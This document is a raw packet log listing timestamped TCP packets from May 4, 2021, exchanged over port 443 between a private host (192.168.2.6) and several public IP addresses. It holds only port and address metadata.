May 4, 2021 12:35:12.021666050 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.022206068 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.022272110 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.022339106 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.023392916 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.023421049 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.023477077 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.023516893 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.024595022 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.024651051 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.024722099 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.025491953 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.025721073 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.025800943 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.025854111 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.026043892 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.026120901 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.026240110 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.026632071 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.026889086 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.026909113 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.026938915 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.026958942 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.028155088 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.028181076 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.028263092 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.029162884 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.029251099 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.029268980 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.029315948 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.030066967 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.030093908 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.030112028 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.030128002 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.030139923 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.030173063 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.031096935 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.031167984 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.031227112 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.032275915 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.032357931 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.032370090 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.032397985 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.036819935 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036853075 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036875010 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036892891 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036909103 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036926985 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.036956072 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.037014961 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.037586927 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.037615061 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.037678957 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.037997007 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.038058996 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.064965963 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.065048933 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.065056086 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.065102100 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.066652060 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.066715002 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.066751957 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.068818092 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.068888903 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.069015980 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069128990 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069144011 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069150925 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069181919 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.069236994 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069349051 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.069443941 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.070183992 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.071494102 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.072063923 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.084434032 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.084523916 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.084547043 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.084620953 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.085542917 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.111583948 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.127846003 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.134341002 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.134450912 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.138813019 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.139053106 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.139131069 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.140201092 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.175709009 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.180129051 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.180301905 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.180366039 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.180385113 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.180448055 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.206147909 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.206192017 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.206311941 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.217736006 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.217768908 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.217854977 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.217904091 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.222723007 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.223609924 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.271423101 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.284868956 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.284904003 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.285007954 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.285218000 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.285239935 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.285295963 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.285347939 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.286163092 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.286187887 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.286520958 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.287097931 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.287123919 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.287178040 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.287225962 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.288003922 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.288032055 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.288085938 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.288114071 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.288911104 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.288934946 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.289340019 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.289836884 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.289868116 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.289946079 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.289973974 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.290738106 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.290759087 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.290838957 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.291762114 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.291781902 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.291887045 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.291932106 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.292601109 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.292618990 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.292678118 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.293509960 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.293529987 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.293593884 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.294460058 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.294488907 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.294621944 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.295418024 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.295450926 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.295582056 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.296288967 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.296313047 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.296350956 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.296451092 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.297204018 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.297225952 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.297277927 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.297303915 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.298114061 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.298140049 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.298181057 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.298202038 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.299045086 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.299068928 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.299129009 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.299165010 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.299971104 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.299993038 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.300067902 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.300899029 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.300925016 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.301178932 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.301808119 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.301830053 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.301875114 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.301901102 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.302747011 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.302771091 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.302820921 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.302845001 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.303641081 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.303663969 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.303725004 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.303759098 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.304560900 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.304584980 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.304658890 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.304694891 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.305495024 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.305521011 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.305608988 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.306435108 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.306461096 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.306550980 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.306576967 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.307310104 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.307332039 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.307410955 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.307447910 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.308235884 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.308264017 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.308330059 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.309200048 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.309225082 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.309292078 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.309397936 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.310105085 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.310132027 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.310178041 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.310229063 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.311043024 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.311067104 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.311148882 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.311954975 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.311980963 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.312035084 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.312083960 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.312887907 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.312912941 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.312964916 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.313079119 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.326154947 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.326190948 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.326374054 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.326514959 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.326535940 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.326615095 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.326633930 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.327464104 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.327493906 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.327565908 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.327585936 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.407187939 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.413491011 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.417437077 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.451595068 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451638937 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451666117 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451689959 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451716900 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.451752901 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.451905966 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451932907 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451946974 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.451968908 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.452006102 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.465811014 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.465939999 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.469316006 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.469454050 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.470113993 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.470611095 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.483537912 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.497646093 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.503801107 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.503864050 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.504005909 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.504085064 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.519727945 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.519819975 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.519874096 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.519968987 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.519993067 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520006895 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520015001 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.520032883 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.520075083 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.520418882 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520885944 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520915031 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520936012 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520955086 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.520961046 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.520987034 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.521030903 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.531068087 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.531685114 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.531841040 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.531966925 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.532284021 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.543817043 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.545075893 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.560735941 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.560887098 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.570931911 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.570957899 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.571090937 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.576976061 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.577008009 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.577028036 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.577049017 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.577092886 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.577136040 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.577292919 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.577357054 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.581197977 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.581320047 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.581511974 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.581532955 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.581599951 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.581636906 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.581880093 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.582035065 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.583728075 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.583816051 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.586100101 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.586617947 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.587630033 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.587908983 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.633977890 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.634021997 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.634047985 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.634068966 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.634155989 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.634253979 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.637528896 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.639233112 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.639365911 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:12.678262949 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:12.698213100 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.698389053 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.698673964 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.698757887 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.699105978 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.699599028 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.700278997 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:12.836215973 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.836256027 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837590933 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837629080 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837651014 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837676048 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837681055 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.837693930 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.837726116 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.837786913 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.838535070 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.838571072 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.838596106 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.838618994 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.838637114 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.838639975 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.838701010 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.851016045 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.851181984 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.851521969 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.851761103 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.851888895 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.885171890 CEST	443	49734	50.87.249.219	192.168.2.6
